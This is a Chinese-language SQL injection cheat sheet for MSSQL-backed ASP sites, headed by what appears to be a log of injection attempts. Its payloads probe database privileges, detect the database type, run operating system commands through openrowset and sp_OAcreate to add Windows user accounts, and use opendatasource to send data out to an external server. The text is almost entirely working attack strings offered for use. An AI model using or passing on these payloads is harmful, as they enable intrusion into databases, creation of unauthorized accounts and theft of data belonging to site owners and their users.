选中 操作页面 提交数据 IP/日期 方式 /zz_article/articleshow.asp articleid=297 And Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1))+char(124)=1 124.237.26.212 2007-11-14 SQL注入(GET) /product/productshow.asp productid=74 And Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1))+char(124)=1 124.237.26.212 2007-11-14 SQL注入(GET) /product/productshow.asp productid=90 And Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1))+char(124)=1 124.237.26.212 2007-11-14 SQL注入(GET)
//看看是什么权限的 and 1=(Select IS_MEMBER('db_owner')) And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
//检测是否有读取某数据库的权限 and 1= (Select HAS_DBACCESS('master')) And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
数字类型 and char(124)%2Buser%2Bchar(124)=0
字符类型 ' and char(124)%2Buser%2Bchar(124)=0 and ''='
搜索类型 ' and char(124)%2Buser%2Bchar(124)=0 and '%'='
爆用户名 and user>0 ' and user>0 and ''='
检测是否为SA权限 and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
检测是不是MSSQL数据库 and exists (select * from sysobjects);--
然后利用jet.oledb执行系统命令 select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
执行命令 ;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
判断xp_cmdshell扩展存储过程是否存在: http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
//得到数据库名 insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
